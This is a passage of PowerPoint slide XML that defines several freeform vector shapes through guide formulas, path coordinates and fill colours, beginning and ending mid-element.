                  <a:gd name="T47" fmla="*/ 3 h 10"/>
                  <a:gd name="T48" fmla="*/ 24 w 37"/>
                  <a:gd name="T49" fmla="*/ 3 h 10"/>
                  <a:gd name="T50" fmla="*/ 22 w 37"/>
                  <a:gd name="T51" fmla="*/ 2 h 10"/>
                  <a:gd name="T52" fmla="*/ 18 w 37"/>
                  <a:gd name="T53" fmla="*/ 2 h 10"/>
                  <a:gd name="T54" fmla="*/ 15 w 37"/>
                  <a:gd name="T55" fmla="*/ 2 h 10"/>
                  <a:gd name="T56" fmla="*/ 13 w 37"/>
                  <a:gd name="T57" fmla="*/ 3 h 10"/>
                  <a:gd name="T58" fmla="*/ 9 w 37"/>
                  <a:gd name="T59" fmla="*/ 3 h 10"/>
                  <a:gd name="T60" fmla="*/ 7 w 37"/>
                  <a:gd name="T61" fmla="*/ 4 h 10"/>
                  <a:gd name="T62" fmla="*/ 4 w 37"/>
                  <a:gd name="T63" fmla="*/ 5 h 10"/>
                  <a:gd name="T64" fmla="*/ 2 w 37"/>
                  <a:gd name="T65" fmla="*/ 8 h 10"/>
                  <a:gd name="T66" fmla="*/ 0 w 37"/>
                  <a:gd name="T67" fmla="*/ 10 h 10"/>
                  <a:gd name="T68" fmla="*/ 0 w 37"/>
                  <a:gd name="T69" fmla="*/ 7 h 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0"/>
                  <a:gd name="T107" fmla="*/ 37 w 37"/>
                  <a:gd name="T108" fmla="*/ 10 h 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0">
                    <a:moveTo>
                      <a:pt x="0" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10796" name="Freeform 203"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1818" y="2342"/>
                <a:ext cx="37" cy="11"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 37"/>
                  <a:gd name="T1" fmla="*/ 7 h 11"/>
                  <a:gd name="T2" fmla="*/ 0 w 37"/>
                  <a:gd name="T3" fmla="*/ 7 h 11"/>
                  <a:gd name="T4" fmla="*/ 0 w 37"/>
                  <a:gd name="T5" fmla="*/ 6 h 11"/>
                  <a:gd name="T6" fmla="*/ 1 w 37"/>
                  <a:gd name="T7" fmla="*/ 6 h 11"/>
                  <a:gd name="T8" fmla="*/ 1 w 37"/>
                  <a:gd name="T9" fmla="*/ 5 h 11"/>
                  <a:gd name="T10" fmla="*/ 2 w 37"/>
                  <a:gd name="T11" fmla="*/ 4 h 11"/>
                  <a:gd name="T12" fmla="*/ 3 w 37"/>
                  <a:gd name="T13" fmla="*/ 4 h 11"/>
                  <a:gd name="T14" fmla="*/ 4 w 37"/>
                  <a:gd name="T15" fmla="*/ 2 h 11"/>
                  <a:gd name="T16" fmla="*/ 7 w 37"/>
                  <a:gd name="T17" fmla="*/ 1 h 11"/>
                  <a:gd name="T18" fmla="*/ 9 w 37"/>
                  <a:gd name="T19" fmla="*/ 1 h 11"/>
                  <a:gd name="T20" fmla="*/ 11 w 37"/>
                  <a:gd name="T21" fmla="*/ 0 h 11"/>
                  <a:gd name="T22" fmla="*/ 15 w 37"/>
                  <a:gd name="T23" fmla="*/ 0 h 11"/>
                  <a:gd name="T24" fmla="*/ 18 w 37"/>
                  <a:gd name="T25" fmla="*/ 0 h 11"/>
                  <a:gd name="T26" fmla="*/ 22 w 37"/>
                  <a:gd name="T27" fmla="*/ 0 h 11"/>
                  <a:gd name="T28" fmla="*/ 27 w 37"/>
                  <a:gd name="T29" fmla="*/ 1 h 11"/>
                  <a:gd name="T30" fmla="*/ 31 w 37"/>
                  <a:gd name="T31" fmla="*/ 2 h 11"/>
                  <a:gd name="T32" fmla="*/ 37 w 37"/>
                  <a:gd name="T33" fmla="*/ 4 h 11"/>
                  <a:gd name="T34" fmla="*/ 37 w 37"/>
                  <a:gd name="T35" fmla="*/ 6 h 11"/>
                  <a:gd name="T36" fmla="*/ 36 w 37"/>
                  <a:gd name="T37" fmla="*/ 6 h 11"/>
                  <a:gd name="T38" fmla="*/ 36 w 37"/>
                  <a:gd name="T39" fmla="*/ 6 h 11"/>
                  <a:gd name="T40" fmla="*/ 34 w 37"/>
                  <a:gd name="T41" fmla="*/ 5 h 11"/>
                  <a:gd name="T42" fmla="*/ 32 w 37"/>
                  <a:gd name="T43" fmla="*/ 5 h 11"/>
                  <a:gd name="T44" fmla="*/ 30 w 37"/>
                  <a:gd name="T45" fmla="*/ 5 h 11"/>
                  <a:gd name="T46" fmla="*/ 28 w 37"/>
                  <a:gd name="T47" fmla="*/ 4 h 11"/>
                  <a:gd name="T48" fmla="*/ 24 w 37"/>
                  <a:gd name="T49" fmla="*/ 4 h 11"/>
                  <a:gd name="T50" fmla="*/ 22 w 37"/>
                  <a:gd name="T51" fmla="*/ 2 h 11"/>
                  <a:gd name="T52" fmla="*/ 18 w 37"/>
                  <a:gd name="T53" fmla="*/ 2 h 11"/>
                  <a:gd name="T54" fmla="*/ 15 w 37"/>
                  <a:gd name="T55" fmla="*/ 2 h 11"/>
                  <a:gd name="T56" fmla="*/ 13 w 37"/>
                  <a:gd name="T57" fmla="*/ 4 h 11"/>
                  <a:gd name="T58" fmla="*/ 9 w 37"/>
                  <a:gd name="T59" fmla="*/ 4 h 11"/>
                  <a:gd name="T60" fmla="*/ 7 w 37"/>
                  <a:gd name="T61" fmla="*/ 5 h 11"/>
                  <a:gd name="T62" fmla="*/ 4 w 37"/>
                  <a:gd name="T63" fmla="*/ 6 h 11"/>
                  <a:gd name="T64" fmla="*/ 2 w 37"/>
                  <a:gd name="T65" fmla="*/ 8 h 11"/>
                  <a:gd name="T66" fmla="*/ 0 w 37"/>
                  <a:gd name="T67" fmla="*/ 11 h 11"/>
                  <a:gd name="T68" fmla="*/ 0 w 37"/>
                  <a:gd name="T69" fmla="*/ 7 h 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1"/>
                  <a:gd name="T107" fmla="*/ 37 w 37"/>
                  <a:gd name="T108" fmla="*/ 11 h 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1">
                    <a:moveTo>
                      <a:pt x="0" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10797" name="Freeform 204"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1853" y="2330"/>
                <a:ext cx="60" cy="114"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 60"/>
                  <a:gd name="T1" fmla="*/ 0 h 114"/>
                  <a:gd name="T2" fmla="*/ 0 w 60"/>
                  <a:gd name="T3" fmla="*/ 110 h 114"/>
                  <a:gd name="T4" fmla="*/ 18 w 60"/>
                  <a:gd name="T5" fmla="*/ 114 h 114"/>
                  <a:gd name="T6" fmla="*/ 17 w 60"/>
                  <a:gd name="T7" fmla="*/ 98 h 114"/>
                  <a:gd name="T8" fmla="*/ 60 w 60"/>
                  <a:gd name="T9" fmla="*/ 105 h 114"/>
                  <a:gd name="T10" fmla="*/ 60 w 60"/>
                  <a:gd name="T11" fmla="*/ 100 h 114"/>
                  <a:gd name="T12" fmla="*/ 30 w 60"/>
                  <a:gd name="T13" fmla="*/ 96 h 114"/>
                  <a:gd name="T14" fmla="*/ 29 w 60"/>
                  <a:gd name="T15" fmla="*/ 83 h 114"/>
                  <a:gd name="T16" fmla="*/ 9 w 60"/>
                  <a:gd name="T17" fmla="*/ 83 h 114"/>
                  <a:gd name="T18" fmla="*/ 8 w 60"/>
                  <a:gd name="T19" fmla="*/ 81 h 114"/>
                  <a:gd name="T20" fmla="*/ 7 w 60"/>
                  <a:gd name="T21" fmla="*/ 76 h 114"/>
                  <a:gd name="T22" fmla="*/ 6 w 60"/>
                  <a:gd name="T23" fmla="*/ 69 h 114"/>
                  <a:gd name="T24" fmla="*/ 3 w 60"/>
                  <a:gd name="T25" fmla="*/ 60 h 114"/>
                  <a:gd name="T26" fmla="*/ 2 w 60"/>
                  <a:gd name="T27" fmla="*/ 48 h 114"/>
                  <a:gd name="T28" fmla="*/ 1 w 60"/>
                  <a:gd name="T29" fmla="*/ 34 h 114"/>
                  <a:gd name="T30" fmla="*/ 2 w 60"/>
                  <a:gd name="T31" fmla="*/ 20 h 114"/>
                  <a:gd name="T32" fmla="*/ 6 w 60"/>
                  <a:gd name="T33" fmla="*/ 4 h 114"/>
                  <a:gd name="T34" fmla="*/ 0 w 60"/>
                  <a:gd name="T35" fmla="*/ 0 h 1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114"/>
                  <a:gd name="T56" fmla="*/ 60 w 60"/>
                  <a:gd name="T57" fmla="*/ 114 h 1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114">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="001999"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10798" name="Freeform 205"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1883" y="2305"/>
                <a:ext cx="78" cy="15"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 78"/>
                  <a:gd name="T1" fmla="*/ 15 h 15"/>
                  <a:gd name="T2" fmla="*/ 0 w 78"/>
                  <a:gd name="T3" fmla="*/ 15 h 15"/>
                  <a:gd name="T4" fmla="*/ 2 w 78"/>
                  <a:gd name="T5" fmla="*/ 14 h 15"/>
                  <a:gd name="T6" fmla="*/ 4 w 78"/>
                  <a:gd name="T7" fmla="*/ 14 h 15"/>
                  <a:gd name="T8" fmla="*/ 7 w 78"/>
                  <a:gd name="T9" fmla="*/ 12 h 15"/>
                  <a:gd name="T10" fmla="*/ 11 w 78"/>
                  <a:gd name="T11" fmla="*/ 11 h 15"/>
                  <a:gd name="T12" fmla="*/ 14 w 78"/>
                  <a:gd name="T13" fmla="*/ 10 h 15"/>
                  <a:gd name="T14" fmla="*/ 19 w 78"/>
                  <a:gd name="T15" fmla="*/ 9 h 15"/>
                  <a:gd name="T16" fmla="*/ 23 w 78"/>
                  <a:gd name="T17" fmla="*/ 8 h 15"/>
                  <a:gd name="T18" fmla="*/ 29 w 78"/>
                  <a:gd name="T19" fmla="*/ 8 h 15"/>
                  <a:gd name="T20" fmla="*/ 35 w 78"/>
                  <a:gd name="T21" fmla="*/ 7 h 15"/>
                  <a:gd name="T22" fmla="*/ 42 w 78"/>
                  <a:gd name="T23" fmla="*/ 7 h 15"/>
                  <a:gd name="T24" fmla="*/ 48 w 78"/>
                  <a:gd name="T25" fmla="*/ 5 h 15"/>
                  <a:gd name="T26" fmla="*/ 55 w 78"/>
                  <a:gd name="T27" fmla="*/ 7 h 15"/>
                  <a:gd name="T28" fmla="*/ 62 w 78"/>
                  <a:gd name="T29" fmla="*/ 7 h 15"/>
                  <a:gd name="T30" fmla="*/ 69 w 78"/>
                  <a:gd name="T31" fmla="*/ 8 h 15"/>
                  <a:gd name="T32" fmla="*/ 76 w 78"/>
                  <a:gd name="T33" fmla="*/ 9 h 15"/>
                  <a:gd name="T34" fmla="*/ 78 w 78"/>
                  <a:gd name="T35" fmla="*/ 0 h 15"/>
                  <a:gd name="T36" fmla="*/ 78 w 78"/>
                  <a:gd name="T37" fmla="*/ 0 h 15"/>
                  <a:gd name="T38" fmla="*/ 76 w 78"/>
                  <a:gd name="T39" fmla="*/ 0 h 15"/>
                  <a:gd name="T40" fmla="*/ 74 w 78"/>
                  <a:gd name="T41" fmla="*/ 0 h 15"/>
                  <a:gd name="T42" fmla="*/ 70 w 78"/>
                  <a:gd name="T43" fmla="*/ 0 h 15"/>
                  <a:gd name="T44" fmla="*/ 65 w 78"/>
                  <a:gd name="T45" fmla="*/ 0 h 15"/>
                  <a:gd name="T46" fmla="*/ 61 w 78"/>
                  <a:gd name="T47" fmla="*/ 0 h 15"/>
                  <a:gd name="T48" fmla="*/ 56 w 78"/>
                  <a:gd name="T49" fmla="*/ 0 h 15"/>
                  <a:gd name="T50" fmla="*/ 50 w 78"/>
                  <a:gd name="T51" fmla="*/ 1 h 15"/>
                  <a:gd name="T52" fmla="*/ 43 w 78"/>
                  <a:gd name="T53" fmla="*/ 1 h 15"/>
                  <a:gd name="T54" fmla="*/ 37 w 78"/>
                  <a:gd name="T55" fmla="*/ 1 h 15"/>
                  <a:gd name="T56" fmla="*/ 30 w 78"/>
                  <a:gd name="T57" fmla="*/ 2 h 15"/>
                  <a:gd name="T58" fmla="*/ 25 w 78"/>
                  <a:gd name="T59" fmla="*/ 3 h 15"/>
                  <a:gd name="T60" fmla="*/ 18 w 78"/>
                  <a:gd name="T61" fmla="*/ 4 h 15"/>
                  <a:gd name="T62" fmla="*/ 12 w 78"/>
                  <a:gd name="T63" fmla="*/ 5 h 15"/>
                  <a:gd name="T64" fmla="*/ 6 w 78"/>
                  <a:gd name="T65" fmla="*/ 7 h 15"/>
                  <a:gd name="T66" fmla="*/ 0 w 78"/>
                  <a:gd name="T67" fmla="*/ 8 h 15"/>
                  <a:gd name="T68" fmla="*/ 0 w 78"/>
                  <a:gd name="T69" fmla="*/ 15 h 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8"/>
                  <a:gd name="T106" fmla="*/ 0 h 15"/>
                  <a:gd name="T107" fmla="*/ 78 w 78"/>
                  <a:gd name="T108" fmla="*/ 15 h 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8" h="15">
                    <a:moveTo>
                      <a:pt x="0" y="15"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10799" name="Freeform 206"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1838" y="2446"/>
                <a:ext cx="131" cy="44"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 54 w 131"/>
                  <a:gd name="T1" fmla="*/ 43 h 44"/>
                  <a:gd name="T2" fmla="*/ 56 w 131"/>
                  <a:gd name="T3" fmla="*/ 42 h 44"/>
                  <a:gd name="T4" fmla="*/ 56 w 131"/>
                  <a:gd name="T5" fmla="*/ 42 h 44"/>
                  <a:gd name="T6" fmla="*/ 57 w 131"/>
                  <a:gd name="T7" fmla="*/ 42 h 44"/>
                  <a:gd name="T8" fmla="*/ 59 w 131"/>
                  <a:gd name="T9" fmla="*/ 41 h 44"/>
                  <a:gd name="T10" fmla="*/ 60 w 131"/>
                  <a:gd name="T11" fmla="*/ 41 h 44"/>
                  <a:gd name="T12" fmla="*/ 63 w 131"/>
                  <a:gd name="T13" fmla="*/ 40 h 44"/>
                  <a:gd name="T14" fmla="*/ 65 w 131"/>
                  <a:gd name="T15" fmla="*/ 39 h 44"/>
                  <a:gd name="T16" fmla="*/ 67 w 131"/>
                  <a:gd name="T17" fmla="*/ 37 h 44"/>
                  <a:gd name="T18" fmla="*/ 71 w 131"/>
                  <a:gd name="T19" fmla="*/ 36 h 44"/>
                  <a:gd name="T20" fmla="*/ 73 w 131"/>
                  <a:gd name="T21" fmla="*/ 34 h 44"/>
                  <a:gd name="T22" fmla="*/ 75 w 131"/>
                  <a:gd name="T23" fmla="*/ 33 h 44"/>
                  <a:gd name="T24" fmla="*/ 78 w 131"/>
                  <a:gd name="T25" fmla="*/ 30 h 44"/>
                  <a:gd name="T26" fmla="*/ 80 w 131"/>
                  <a:gd name="T27" fmla="*/ 29 h 44"/>
                  <a:gd name="T28" fmla="*/ 81 w 131"/>
                  <a:gd name="T29" fmla="*/ 27 h 44"/>
                  <a:gd name="T30" fmla="*/ 84 w 131"/>
                  <a:gd name="T31" fmla="*/ 26 h 44"/>
                  <a:gd name="T32" fmla="*/ 85 w 131"/>
                  <a:gd name="T33" fmla="*/ 23 h 44"/>
                  <a:gd name="T34" fmla="*/ 0 w 131"/>
                  <a:gd name="T35" fmla="*/ 2 h 44"/>
                  <a:gd name="T36" fmla="*/ 5 w 131"/>
                  <a:gd name="T37" fmla="*/ 0 h 44"/>
                  <a:gd name="T38" fmla="*/ 131 w 131"/>
                  <a:gd name="T39" fmla="*/ 32 h 44"/>
                  <a:gd name="T40" fmla="*/ 126 w 131"/>
                  <a:gd name="T41" fmla="*/ 34 h 44"/>
                  <a:gd name="T42" fmla="*/ 89 w 131"/>
                  <a:gd name="T43" fmla="*/ 25 h 44"/>
                  <a:gd name="T44" fmla="*/ 89 w 131"/>
                  <a:gd name="T45" fmla="*/ 25 h 44"/>
                  <a:gd name="T46" fmla="*/ 89 w 131"/>
                  <a:gd name="T47" fmla="*/ 26 h 44"/>
                  <a:gd name="T48" fmla="*/ 88 w 131"/>
                  <a:gd name="T49" fmla="*/ 26 h 44"/>
                  <a:gd name="T50" fmla="*/ 88 w 131"/>
                  <a:gd name="T51" fmla="*/ 27 h 44"/>
                  <a:gd name="T52" fmla="*/ 87 w 131"/>
                  <a:gd name="T53" fmla="*/ 28 h 44"/>
                  <a:gd name="T54" fmla="*/ 86 w 131"/>
                  <a:gd name="T55" fmla="*/ 29 h 44"/>
                  <a:gd name="T56" fmla="*/ 85 w 131"/>
                  <a:gd name="T57" fmla="*/ 30 h 44"/>
                  <a:gd name="T58" fmla="*/ 82 w 131"/>
                  <a:gd name="T59" fmla="*/ 32 h 44"/>
                  <a:gd name="T60" fmla="*/ 80 w 131"/>
                  <a:gd name="T61" fmla="*/ 33 h 44"/>
                  <a:gd name="T62" fmla="*/ 78 w 131"/>
                  <a:gd name="T63" fmla="*/ 34 h 44"/>
                  <a:gd name="T64" fmla="*/ 75 w 131"/>
                  <a:gd name="T65" fmla="*/ 36 h 44"/>
                  <a:gd name="T66" fmla="*/ 72 w 131"/>
                  <a:gd name="T67" fmla="*/ 37 h 44"/>
                  <a:gd name="T68" fmla="*/ 70 w 131"/>
                  <a:gd name="T69" fmla="*/ 40 h 44"/>
                  <a:gd name="T70" fmla="*/ 65 w 131"/>
                  <a:gd name="T71" fmla="*/ 41 h 44"/>
                  <a:gd name="T72" fmla="*/ 61 w 131"/>
                  <a:gd name="T73" fmla="*/ 42 h 44"/>
                  <a:gd name="T74" fmla="*/ 57 w 131"/>
                  <a:gd name="T75" fmla="*/ 44 h 44"/>
                  <a:gd name="T76" fmla="*/ 54 w 131"/>
                  <a:gd name="T77" fmla="*/ 43 h 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1"/>
                  <a:gd name="T118" fmla="*/ 0 h 44"/>
                  <a:gd name="T119" fmla="*/ 131 w 131"/>
                  <a:gd name="T120" fmla="*/ 44 h 4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1" h="44">
                    <a:moveTo>
                      <a:pt x="54" y="43"/>
                    </a:moveTo>
                    <a:lnTo>
